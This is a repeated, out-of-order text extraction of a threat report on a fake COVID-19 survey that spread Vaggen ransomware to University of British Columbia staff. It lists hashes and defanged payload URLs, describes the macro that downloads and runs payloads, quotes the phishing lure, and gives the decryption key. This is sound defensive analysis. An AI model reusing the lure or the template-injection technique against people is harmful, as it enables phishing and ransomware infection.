3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1730 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1731 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1732 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1733 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1734 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1735 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1736 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1737 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1738 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1739 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1740 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1741 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1742 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1743 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1744 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1745 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1746 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1747 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1748 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1749 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1750 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1751 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1752 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1753 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1754 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1755 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1756 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1757 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1758 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1759 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1760 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1761 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1762 of 